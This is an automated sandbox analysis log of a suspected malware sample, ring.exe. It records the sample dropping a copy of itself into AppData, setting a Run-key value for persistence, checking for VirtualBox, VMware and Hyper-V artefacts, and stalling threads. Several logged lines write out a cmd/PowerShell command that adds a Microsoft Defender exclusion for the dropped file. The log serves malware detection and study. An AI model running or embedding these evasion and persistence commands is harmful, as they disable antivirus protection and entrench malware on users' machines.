Source: ring.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4a2400
Source: ring.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xb87600
Source: ring.exeStatic PE information: More than 200 imports for user32.dll
Source: ring.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: ring.exeStatic PE information: section name: .didata
Source: ring.exe.4.drStatic PE information: section name: .didata
Source: C:\Users\user\Desktop\ring.exeFile created: C:\Users\user\AppData\Roaming\Win_24230\ring.exeJump to dropped file
Source: C:\Users\user\Desktop\ring.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinSespJump to behavior
Source: C:\Users\user\Desktop\ring.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinSespJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxHook.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\VBoxHook.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile opened / queried: C:\Windows\system\VBoxHook.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile opened / queried: C:\Windows\VBoxHook.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxHook.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\VBoxHook.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile opened / queried: C:\Users\user\Desktop\VBoxHook.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile opened / queried: \\\VBoxMiniRdrDNJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\VBoxHook.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile opened / queried: C:\Windows\SysWOW64\VBoxHook.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7319Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2374Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep count: 7319 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep count: 2374 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: ring.exe, ring.exe.4.drBinary or memory string: VBoxHook.dllU
Source: ring.exe, 00000004.00000002.2527929541.0000000001B10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
Source: ring.exe, 00000004.00000002.2527929541.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 00000004.00000002.2527929541.0000000001B10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: ring.exe.4.drBinary or memory string: VMWare
Source: ring.exe, 0000000D.00000003.1458057883.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 0000000E.00000003.1536980330.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ring.exe, ring.exe.4.drBinary or memory string: \\\\.\\\VBoxMiniRdrDN
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\ring.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Users\user\Desktop\ring.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"Jump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"Jump to behavior
Source: ring.exe, 00000004.00000002.2529177771.00000000036A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: ring.exe, 00000004.00000002.2529177771.00000000036A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager@
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
